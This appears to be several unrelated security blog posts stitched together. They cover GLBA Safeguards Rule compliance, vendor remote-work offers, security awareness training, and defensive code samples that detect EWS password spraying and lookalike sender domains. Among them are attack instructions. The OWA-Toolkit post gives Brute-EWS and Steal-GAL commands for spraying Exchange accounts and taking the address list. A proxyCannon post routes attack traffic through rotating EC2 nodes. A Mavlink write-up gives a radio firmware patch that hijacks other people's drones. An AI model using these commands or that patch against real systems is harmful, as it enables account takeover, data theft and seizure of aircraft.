The GLBA Safeguard Rule has changed, and it isn't just banks that need to understand it.

Back in 1999, the Gramm-Leach-Bliley Act was passed in the United States. Its main purpose was to allow banks to offer services that previously were forbidden by laws passed even farther back in 1933. In doing so, the scope of these new rules surrounding these services not only applied to banks, but also to any organization that offered them.

A primary component of this Act, Section 501, requires the protection of non-public personal information. It states, "...each financial institution has an affirmative and continuing obligation to respect the privacy of its customers and to protect the security and confidentiality of those customers' nonpublic personal information."

Privacy, Security, Confidentiality. Could you identify a hot topic in information security today that doesn't involve one or all three of those areas? Couple that intense interest with the changes in technology that have occurred over the past 20 years, and the current pace that they continue to change, and you can understand why amendments to the GLBA were needed.

The main rule we will discuss here is the Standards for Safeguarding Customer Information, commonly called the Safeguards Rule. Originally published in 2001, this rule was just amended (January 10, 2022) and some of the most important provisions will become effective on December 9, 2022. The overlying goal of this rule is the requirement to have, "the administrative, technical, or physical safeguards you use to access, collect, distribute, process, protect, store, use, transmit, dispose of, or otherwise handle customer information."

Does this apply to me?

You can't duck the issue based on size. Nearly all rules apply, regardless of size, except for some new elements which apply to entities that maintain fewer than 5,000 consumer records. The most important qualifier is:

  1. You are considered to be a "financial institution" under the GLBA's definitions, or
  2. You receive information about customers of financial institutions.

If either of these are true, then the GLBA rules apply to you.

What is a financial institution according to the GLBA? The exact definition is, "any institution the business of which is engaging in an activity that is financial in nature or incidental to such financial activities as described in section 4(k) of the Bank Holding Company Act of 1956, 12 U.S.C. 1843(k)." In case you don't have the Bank Holding Company Act handy, here is a list of examples of financial institutions that the GLBA applies to, as noted in 16 CFR 314.2(h)(2)(iv):

These are just some examples, and this list is not all inclusive. Note that simply letting someone run a tab or accepting payments in the form of a credit card that was not issued by the seller does not make an entity a financial institution.

Ok, it applies to me. Now what?

At the heart of the Safeguards Rule are a number of key elements involving the development, maintenance, and enforcement of a written information security plan (ISP). The key aspects and notable amendments:

  1. A single qualified individual must be designated to oversee, implement, and enforce the ISP. This is a change from the original language, which allowed for one or more employees to coordinate the program. If your organization doesn't have a qualified individual on staff, a third-party company can be utilized for this function. This does, however, require the designation of a senior member of the organization to direct and oversee the third-party representative(s), and all compliance obligations remain with the hiring organization.
  2. A risk assessment process must be in place. This process must identify and assess risks to customer information in each relevant company area and evaluate the effectiveness of current controls implemented to mitigate those risks. This is not a new requirement; however, for companies maintaining information on 5,000 or more customers, the following elements must be part of the risk assessment documentation:
    1. The criteria used to evaluate and categorize risks and threats to information systems
    2. The criteria used to assess the confidentiality, integrity, and availability of information and systems used to process customer information and adequacy of the existing controls
    3. A description of how identified risks will be mitigated or accepted, and how the ISP will address those risks
  3. Design and implement a safeguards program, and regularly monitor and test it. This is not a new requirement; however, the amendments added eight specific types of safeguards that must be part of this program:
    1. Physical and technical access controls, including a review of authorized users
    2. Identification and evaluation of the data, personnel, devices, and systems used that interact with customer data
    3. Encryption of all customer information, both in transit and at rest
    4. Secure development practices and security testing for applications used for transmitting, accessing, or storing customer information
    5. Implementation of multi-factor authentication for any information system that contains customer information accessed by any individual. This requirement can also be met if the qualified individual noted in item 1 has approved an equivalent or stronger control.
    6. Procedures for the secure disposal of customer information no later than two years after the last date the information is used unless retention is otherwise required or necessary for legitimate business purposes
    7. Implementation of change management policies
    8. Implementation of policies, procedures, and controls to monitor and log authorized user activity and detect unauthorized use
  4. Routine testing and monitoring of controls enforcing the safeguards program must be conducted to evaluate their effectiveness. This is not a new addition; however, two specific control tests are now required for companies maintaining information on 5,000 or more customers:
    1. Conduct vulnerability scanning at least every six months
    2. Undergo penetration testing at least annually
  5. Specific policy requirements for training of information systems personnel and general security awareness training. The amendments add specificity to the existing training requirements that were already in place and require formal documentation of the policies. These specific elements include:
    1. Security updates and training procedures to address new risks specific to systems that are running in the enterprise's environment
    2. Verification that key personnel are maintaining their knowledge of threats and available defenses against those threats
    3. General security awareness training requirements and procedures for all employees and engaged third parties utilizing the enterprise's information systems
  6. The requirement to oversee service providers that assist in the preparation, maintenance, and use of the environment handling consumer data was part of the original rule. This requires the selection of service providers capable of maintaining appropriate safeguards, and contract language that mandates these safeguards. The amendments add a requirement that service providers must be periodically assessed on the risks associated with their use and the adequacy of the safeguards they have implemented.
  7. A new requirement for entities handling more than 5,000 consumer records is for the existence of a written incident response plan. There are seven requirements for this plan in the new amendments:
    1. Stated goals of the response plan
    2. A description of internal procedures for responding to a security event
    3. The definition of roles, responsibilities, and levels of decision-making authority for individuals involved in the incident response process
    4. Plans for handling internal and external communications, and details on the use of information sharing resources
    5. Procedures for the remediation of identified weaknesses in information systems and associated controls
    6. Requirements for documenting and reporting of security events, procedures classifying incidents, and the activation of the incident response plan
    7. A defined process for post-incident performance, evaluation, and revision of the incident response plan following an event.
  8. Another new requirement for entities handling more than 5,000 consumer records is for a written report, presented to the enterprise's governing body or senior/executive level individual, done on at least an annual basis. This report is to be created by the qualified individual responsible for oversight of the ISP as noted in item number one. There are two elements required to be in the report:
    1. The overall status of the ISP, including its compliance with the updated Safeguards Rule
    2. Recommendations for changes or improvements, and any other material matters related to the ISP

That's a lot of stuff! How long do I have to comply?

Covered financial institutions should be in compliance with the non-amended components of the Safeguards Rule already, since the formal effective date of the rule was January 10, 2022. The FTC has allowed for an effective date of December 9, 2022, for the amended provisions due to the length of time required to implement them.

Are there penalties for non-compliance?

Besides the potential costs associated with breaches, successful malware attacks, ransomware, and the like, there are penalties that can be assessed by the FTC for non-compliance. These penalties can apply to the enterprise and/or individuals responsible for compliance as follows:

So, if this does apply to you and your organization, hopefully you are already compliant and none of this was a surprise to you. If this doesn't apply to you, I commend you for reading on. And if it applies and you are completely surprised by the requirements and amendments, the clock is ticking!

*Offers updated on March 26, 2020

Most enterprises are getting slammed with employees working from home. Most of us designed our remote user VPNs for the occasional "snow day" ...right. Now we have an entire workforce, working from home full time for weeks…maybe months …oh yeah, and using a full suite of applications including voice… crazy. No really!

Many of you have contacted SynerComm to get additional VPN licenses/concentrators, endpoint security controls, and help designing and spinning up "new ways" to get employees connected securely. During these crazy times some of our vendors are stepping up and trying to make a difference.

To help you we would like to share a few solutions/offers from our vendors:

Vendor | Offer | Details
Palo Alto Networks | Free 90-day GlobalProtect VPN subscription license for mobile devices like iPads, etc. (Other GP is already free) | Customers log in to their own support portal and select trial licenses
Pulse Secure | Flexible Pulse Connect Secure licensing | Valid through May 31st
CrowdStrike | Surge relief for 60 days (existing customers); CrowdStrike Falcon Prevent home use licenses | Expiration TBD
SentinelOne | Free trials. SentinelOne Core: AI-powered prevention, detection, and automated response in a single, autonomous lightweight agent; legacy antivirus replacement across Windows, Mac, and Linux operating systems with no connectivity or network dependency. Deployment services: remote deployment assistance to ensure rapid installation and customized configuration | Offer expires May 16th
Armorblox | No charge offer to help businesses with 100+ employees during these challenging times. | Expiration TBD
Extreme Networks | Work from Home bundle discount. Extreme Networks and Tech Data have created a Portable Branch Office Kit to enable your customers to connect, secure, and manage remote sites and remote workers quickly and easily. Combining SD-WAN, Wi-Fi, and cloud management into an easy to deploy, plug and play solution, this kit offer delivers the ability to provide an enterprise-class experience for all connected users, regardless of where they reside. | Discounted
Lastline | Lastline Analyst at no cost for 90 days to organizations with 500+ employees. | Offer expires June 30, 2020
Proofpoint | Free trial - Scalable secure access for increasing your mobile workforce. | Offer expires September 30, 2020
UBIQ | Free trial to Trusted File Manager | Offer expires June 20, 2020


Have questions or want some guidance with taking advantage of these vendor offers?

Outlook Web Access (OWA) has been one of the consistently viable attack vectors for pentesters and bad guys alike for many years. Frequently, an attacker will obtain valid credentials by brute forcing OWA portals exposed to the internet. Once credentials are obtained an attacker can then access the target network via any other single factor authentication portals that may also be exposed (Citrix, VPN, or *gulp* RDP).

After using multiple brute force tools I began to see some false negatives, so I decided to dive into writing my own tool. I found that many installations of Exchange provide an API through the Exchange Web Service (EWS) and wrote a set of modules to take advantage of that.

The EWS is a convenient API exposed to allow programmatic access to someone's mailbox and some Exchange functionality (Thanks Microsoft!). To get started using these modules you have to install the Exchange Web Service API (here). Once that is installed get a copy of the OWA-Toolkit from here. Then import the module like so:

Import-module C:\path\to\OWA-Toolkit.psm1

Once you have the module imported you should be able to see what cmdlets it includes:
Decide if you want to brute using user ids or full email addresses and then compile a list of targets. The list should just be a txt file that has one user per line. Then you can invoke Brute-EWS like so (if you want to brute with emails include the Domain parameter):

Brute-EWS -TargetList .\userids.txt -ExchangeVersion 2007_SP1 -ewsPath "https://webmail.yourdomain.com/EWS/Exchange.asmx" -Password "omg123" -Domain "yourdomain.com"

If you so choose you can also pass the UserAsPass parameter to attempt authentication with the userid passed as the password. Once valid credentials are obtained it is common to take the Global Address List (GAL) to use for additional brute forcing or social engineering. This was usually a painful process forcing OWA to load all the addresses while I was proxying it through Burp. So, utilizing the EWS I decided to write a script to take the GAL. To use the Steal-GAL cmdlet you can invoke it like so:

Steal-GAL -Password "littlejohnny" -User "dbetty" -domain "yourdomain.com" -ExchangeVersion 2007_SP1

You can also pipe an exchService object to this cmdlet like so:

OTK-Init -Password "littlejohnny" -User "dbetty" -Domain "yourdomain.com" -ExchangeVersion 2007_SP1 | Steal-GAL

The output is designed to be piped to an output method of your choice; the easiest way I have found is to just add "| export-csv -Path .\gal.csv" to your command. Please provide any feedback or issues you might have to GitHub. Thanks.
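From the defender's side, the activity this post describes (one password tried against a list of accounts through /EWS/Exchange.asmx) leaves a distinctive trail: a burst of HTTP 401 responses for the EWS endpoint, from one source address, spread across many different account names. The following is an added example, not part of the original post or of OWA-Toolkit, showing a detector for that pattern run over sample log lines. The log layout is a simplified, assumed IIS W3C-style field order (date time cs-method cs-uri-stem cs-username c-ip sc-status); real logs declare their fields in the "#Fields:" header, and the regular expression would be adjusted to match. All log lines, account names and addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed simplified IIS W3C-style layout:
# date time cs-method cs-uri-stem cs-username c-ip sc-status
# IIS may record the user as "-" on a failed Basic auth; pass min_users=0 to
# rely on the 401 count alone in that case.
SAMPLE_LOG = """\
2020-01-15 08:00:01 POST /EWS/Exchange.asmx user01 203.0.113.10 401
2020-01-15 08:00:02 POST /EWS/Exchange.asmx user02 203.0.113.10 401
2020-01-15 08:00:03 POST /EWS/Exchange.asmx user03 203.0.113.10 401
2020-01-15 08:00:04 POST /EWS/Exchange.asmx user04 203.0.113.10 401
2020-01-15 08:00:05 POST /EWS/Exchange.asmx user05 203.0.113.10 401
2020-01-15 08:00:06 POST /EWS/Exchange.asmx user06 203.0.113.10 401
2020-01-15 08:00:07 POST /EWS/Exchange.asmx user07 203.0.113.10 401
2020-01-15 08:00:08 POST /EWS/Exchange.asmx user08 203.0.113.10 401
2020-01-15 08:00:09 POST /EWS/Exchange.asmx user09 203.0.113.10 401
2020-01-15 08:00:10 POST /EWS/Exchange.asmx user10 203.0.113.10 401
2020-01-15 08:00:11 POST /EWS/Exchange.asmx user11 203.0.113.10 401
2020-01-15 08:00:12 POST /EWS/Exchange.asmx user12 203.0.113.10 401
2020-01-15 08:00:30 POST /EWS/Exchange.asmx mlopez 198.51.100.7 401
2020-01-15 08:00:41 POST /EWS/Exchange.asmx mlopez 198.51.100.7 401
2020-01-15 08:00:55 POST /EWS/Exchange.asmx mlopez 198.51.100.7 200
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
EWS_PATH = "/ews/exchange.asmx"


def parse_line(line):
    """Parse one log line into a dict; return None for lines that don't match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
        "method": m.group(2),
        "uri": m.group(3).lower(),
        "user": m.group(4),
        "ip": m.group(5),
        "status": int(m.group(6)),
    }


def detect_ews_spraying(lines, window=timedelta(minutes=5), min_failures=10, min_users=5):
    """Flag source IPs with >= min_failures EWS 401s across >= min_users accounts in one window."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["uri"] == EWS_PATH and rec["status"] == 401:
            failures[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in failures.items():
        recs.sort(key=lambda r: r["ts"])
        best = None
        start = 0
        for end in range(len(recs)):
            # Slide the window start forward until the span fits inside `window`.
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            span = recs[start:end + 1]
            users = {r["user"] for r in span if r["user"] != "-"}
            if len(span) >= min_failures and len(users) >= min_users:
                # Keep the largest qualifying burst for this source.
                if best is None or len(span) > best["failures"]:
                    best = {"ip": ip, "failures": len(span), "distinct_users": len(users),
                            "first": span[0]["ts"], "last": span[-1]["ts"]}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_ews_spraying(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['failures']} EWS auth failures across {a['distinct_users']} "
              f"accounts between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

The second source in the sample (two failures then a success from one account) is what a user mistyping a password looks like and stays below the thresholds; lowering them to min_failures=2, min_users=1 shows how quickly that turns into noise, which is why the distinct-account count matters more than the raw 401 count.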

 

 

First, let's talk about what "failure" is and is not in the context of Security Awareness Training (SAT). Failure is not when a company gets breached due to social engineering. Wait, what?? All the outstanding training in the world does not guarantee that an individual will follow it when the moment of testing occurs. Soldiers are trained to the highest levels to deal with the stress and trauma of battle, but still come back scarred, having likely made mistakes in spite of their training.

Security Awareness Training "failure" is when a user is left without the knowledge to act appropriately in a given situation. In other words, when they haven't been properly prepared to handle phishing emails and voice-based scams or to choose a strong password, SAT has failed them. The user clicking on the phishing link is just the end result of this failure.

I submit that SAT failure occurs for (at least) three reasons:

1) Training does not reflect real life security encounters.

I am sick to death of training courses telling users that they should watch out for misspellings and grammar mistakes in the email body, as if phishers don't have access to Word's spell/grammar check. While it's certainly true that phishing emails can and do contain such mistakes, the user is actually provided a false sense of security if that is their sole basis for detection. What if your company employs or works with individuals whose first language isn't English? End users will receive legitimate emails with spelling/grammar mistakes and their training will be for nothing.

Trainer tip: If you want to talk about misspellings, forget the body of the email and focus on the sender's domain! That's more of an effective phishing mitigation technique than looking for misspellings in a paragraph will ever be.
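To make the tip concrete, here is an added example (not from the original post) of the kind of check a trainer can walk users through, and that a mail gateway can automate: classify the sender's domain as the company's own, a lookalike of it, or plainly external. A lookalike is caught three ways: the company domain used as a subdomain of someone else's registrable domain, a digit-for-letter swap (examp1e.com), or a typo within two edits of the real name. The trusted domain example.com, the small homoglyph map and the sample addresses are all constructed for the example.

```python
# Constructed example: the organisation's own domain(s). Assumption: two-label
# registrable domains only; suffixes such as co.uk would need a public-suffix
# list, which this toy check omits.
TRUSTED_DOMAINS = {"example.com"}

# Assumption: a small hand-picked map of digit-for-letter substitutions.
# Production tooling would use a fuller Unicode confusables table.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def normalize(domain):
    """Fold a domain to the letters a reader's eye would see."""
    d = domain.lower().rstrip(".").translate(HOMOGLYPHS)
    return d.replace("rn", "m").replace("vv", "w")


def registrable(domain):
    """Last two labels of a host name (see the public-suffix caveat above)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character typo domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(address, trusted=TRUSTED_DOMAINS):
    """Return 'trusted', 'lookalike' or 'external' for the domain part of an address."""
    domain = address.rsplit("@", 1)[-1].lower().rstrip(".")
    reg = registrable(domain)
    if reg in trusted:
        return "trusted"
    for t in trusted:
        # Our name buried as a subdomain of someone else's domain.
        if domain.startswith(t + "."):
            return "lookalike"
        # Homoglyph swap or a typo within two edits of the real domain.
        if levenshtein(normalize(reg), normalize(t)) <= 2:
            return "lookalike"
    return "external"


if __name__ == "__main__":
    for sender in ("alice@example.com", "it-help@examp1e.com", "hr@exarnple.com",
                   "payroll@exampel.com", "bob@example.com.login-portal.test",
                   "news@vendor.test"):
        print(f"{sender:40} -> {classify_sender(sender)}")
```

The two-edit threshold is deliberately loose and will flag unrelated short domains that happen to be close to yours; for a training demo that is the right trade-off, because the point is to show users where the misspelling actually matters.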

Additionally, how often have we heard to choose a "secure" password like "7Jkw8$hQ"? Look at that thing. Covers all the complexity rules, meets the minimum 8 character corporate standard, a true thing of beauty...

🙁

Trainers say this because they've never cracked a password hash in their whole career and don't know any better (See #2). With our cracking rig, that would take about 2 seconds to crack (NTLMv1 that is. About an hour for NTLMv2).

Trainer Tip: Emphasize length over complexity, every time. "this here password is fantastic" is much stronger than an 8 character complex password and is way easier to type!
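Putting numbers behind "length over complexity", as an added example that is not from the original post: the search space an attacker who knows the length and the character classes in use must cover is alphabet_size ** length, so its log2 is the comparable "bits" figure. The passphrase from the tip is also scored under the pessimistic model where the attacker knows it is five dictionary words (dictionary size of 10,000 is an assumed parameter), and it still beats the 8-character complex password. Any crack time is computed from a guess rate the caller supplies, not a built-in claim.

```python
import math
import string

# Character classes a brute-force attacker who knows the password policy would enumerate.
CLASSES = {
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "digit": string.digits,
    "symbol": string.punctuation,  # the 32 printable ASCII symbols
    "space": " ",
}


def alphabet_size(password):
    """Size of the union of the character classes actually present in the password."""
    return sum(len(chars) for chars in CLASSES.values() if any(c in chars for c in password))


def search_space_bits(password):
    """log2 of the candidates to try when only the length and classes used are known."""
    return len(password) * math.log2(alphabet_size(password))


def passphrase_bits(word_count, dictionary_size):
    """Pessimistic model: the attacker knows the passphrase is word_count dictionary words."""
    return word_count * math.log2(dictionary_size)


def time_to_exhaust(bits, guesses_per_second):
    """Seconds to try every candidate at a guess rate supplied by the caller."""
    return 2 ** bits / guesses_per_second


def compare(complex_pw, passphrase, dictionary_size=10_000):
    """Score a complex password against a passphrase under both attacker models."""
    words = len(passphrase.split())
    return {
        "complex_bits": round(search_space_bits(complex_pw), 1),
        "passphrase_bits": round(search_space_bits(passphrase), 1),
        # Assumed dictionary size: even if the attacker guesses whole words, the
        # passphrase space stays larger than the 8-character complex password's.
        "passphrase_bits_dictionary_model": round(passphrase_bits(words, dictionary_size), 1),
    }


if __name__ == "__main__":
    print(compare("7Jkw8$hQ", "this here password is fantastic"))
```

The complex example scores roughly 52 bits, the passphrase about 147 bits character-by-character and about 66 bits even when treated as five words from a 10,000-word list, so it wins under either model while being easier to type.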

Good SAT has to be thoroughly relevant and a bit scary. Users must understand the consequences of clicking that link or opening that attachment. It's not good enough to simply say "don't do this", they must come to understand why. If they cannot link their improper action with a loss of company data in vivid, graphic detail, you aren't doing your job.

2) Instructor does not have the right experience to be effective.

The best instruction I've ever received, security-wise or other, has been from those who have been there - actually doing the work. They aren't professional trainers. They are simply experts in their field because they've spent years actually doing the things they are training about. When you go on YouTube to learn how to replace a toilet, do you find 17 year old Billy's video and follow that, or do you find some crusty graybeard who's been plumbing his whole life? That's not to say good trainers can't be young, it just means they must be *experienced*.

Let me emphasize this: the WORST thing you can do for your org is to simply relegate your SAT to computer based training. Forcing a user to watch some lame video of a "hacker" so they can click Next as fast as possible before guessing the painfully obvious quiz answers is an egregious waste of company resources, not to mention people's lives.

Real hackers use The Force! 

Do your company's data a favor: pay for high quality live training that will make an impression and get your users talking about security! Fostering a culture of security in your enterprise is one of the best things you can do for your organization's security posture.

3) Training is boring.

This is a personal pet peeve of mine. How often have we watched someone with awesome content who simply could not deliver it well? I'm not talking about people who are nervous during their presentation. That's certainly understandable. I'm talking about people who deliver in a bland, monotone, and otherwise horrible way - devoid of anything close to resembling emotion.

At this point on the revenue curve, you will get exactly the same amount of revenue as this point....

Information Security is one of the most interesting fields in existence today, and one need not look far for stories that will not only make you laugh (or cry), but will also drive home the points you need to make as a trainer.

Trainer Tip: Learn how to tell a good story. Practice in the mirror if you have to, but do not settle for mediocrity. Your training should be engaging and memorable, and when it comes to Information Security, nothing beats a good story! Don't know how to do that? Start here. Then here.

Pro Trainer Tip: Tell stories about your failures. When people observe you as a human, not an "expert", you will connect with them immediately and have their complete attention.

Final Thoughts

If you want to deliver solid infosec training, you must focus on the right things, have the experience to back it up, and be able to connect to your audience. Miss any one of these three and the quality of your training will suffer. Put up screenshots of real phishing emails, do a quick demo of what a compromise looks like, tell your audience how you failed then succeeded, and people will connect with you not only as an expert, but also as one who is in the trenches with them. There is no better place to be as a trainer.

But I'm just organizing the training for my company!

Hire a pentester! They will (hopefully) know their stuff and have the experience to back it up. Have a quick call with them to make sure they don't bore you to tears, and off you go. Don't know who to hire? Call me biased, but I think these guys are pretty good. 🙂

@curi0usJack

This is an update to an older post that can be found here. Since createProxy's initial release, we've received some great feedback and, as a result, we made some improvements. There were several shortcomings with the previous version, all of which rested on the use of ProxyChains. ProxyChains is old, outdated, and failed to support protocols such as UDP or ICMP or Java apps (i.e. Burp). So it was re-written; the code can be found at: https://github.com/Shellntel/scripts/blob/master/proxyCannon.py

The original version used SSH's ability to create SOCKS proxies; however, as it turns out SSH also supports the ability to create both layer 2 and layer 3 tunnels. These are different from a SOCKS connection, in that a fully-fledged network tunnel is established between the two endpoints. Find more details on how to set this up here.

The new proxyCannon script takes advantage of this feature by building VPN tunnels to each EC2 instance and round-robining locally generated traffic between them. Since we're using the local system's routing table, all session information will be retained (i.e. TCP streams are not split between systems). Furthermore, we can now push any network-based traffic across it: TCP, UDP, ICMP and more.

Below are some pictures of proxyCannon in use:


An example of the script starting up 3 ami-d05e75b8 (ubuntu) instances on t2.micro hardware in the us-east-1 region.

Next, in a new tab we verify that our connections are up


Here we can see that 3 SSH connections are successfully established to each public IP of the ec2 instances started


And here we can see that 3 new interfaces were created, one for each SSH tunnel established

With everything stood up, we run a simple test.  In one tab we run a simple ping with a count of 3.


We can see that each ICMP packet is sent through a different EC2 node. Also note the time stamps on the packets: each node is used randomly!

That's it! Browsers, pentesting tools, whatever, should all work seamlessly. To close down the proxy, just go back to your first tab and hit enter.

Any questions, comments or bugs, please feel free to submit them to GitHub. Thanks!

Recently some of us here at shellntel have been building quadcopters and autonomous vehicles for fun.  We are big fans of the Pixhawk flight controller for its awesome autonomous capabilities.  We are also big fans of privacy.  As much as we like to build and fly these drones, we realize doing so in an irresponsible way can cause concern. We started looking into the various drone communications and discovered a design flaw that allowed us to take control of any drone flying with a specific telemetry protocol.

Telemetry allows the drone to exchange information and commands wirelessly with a ground station. This includes sending/receiving GPS coordinates, waypoints, throttle adjustments, arm and disarm commands, pretty much anything, including a serial shell.

The design flaw is not unique to PixHawk, but rather with the Mavlink protocol. Mavlink is used by many companies including:  Parrot AR.Drone (with Flight Recorder), ArduPilot, PX4FMU, pxIMU, SmartAP, MatrixPilot, Armazila 10dM3UOP88, Hexo+, TauLabs and AutoQuad. All of these companies make great products, but if they adopt the Mavlink protocol as is, it may be possible to hijack their drones (and any other drone using Mavlink).

According to its documentation, each Mavlink radio pair is set up with a NetID or channel. This is done to prevent two radio pairs from interfering with each other. By default this value is set to 25, but the user can change this setting. To hijack one of these drones, all you'd need to do is set your transmitter to the same NetID as the target drone.

Looking at the protocol spec, each data packet sent by the radio includes the NetID in its transmission!  This means that all we need to do is listen for a single packet within the frequency spectrum, capture it, carve the NetID, and set our radio to use it.  This, is surprisingly easy.

Using these radios (we used v2), we can modify the OSS firmware to simply do this. The following changes were made to radio.c, which when compiled is flashed to the transmitter.

Original Code:

    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID 
        debug("netid %x %x\n",
               (unsigned)gout[0],
               (unsigned)gout[1]);
        goto failed;
    }

Modified Code:

    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        /* Modified by __int128 */
        // Set our radio to use the captured packet's NetID
        param_set(PARAM_NETID, gout[0]);
        // Save the value to flash
        param_save();
        // To read the new value we need to reboot. Rebooting
        RSTSRC |= (1 << 4);
        /* End of what was added by __int128 */
    }

The variable gout[0] is set earlier in radio.c, where it is populated with the NetID of every captured packet. This block of code is only hit when our radio hears a packet from another radio set on a different NetID from ours (which is good, because we don't want to reboot each time we hear a new packet). Anyway, that's it: 3 lines of code is all it takes to hijack any drone using Mavlink. Compile it, flash the radio and you're good to go. It works surprisingly well and is super quick.
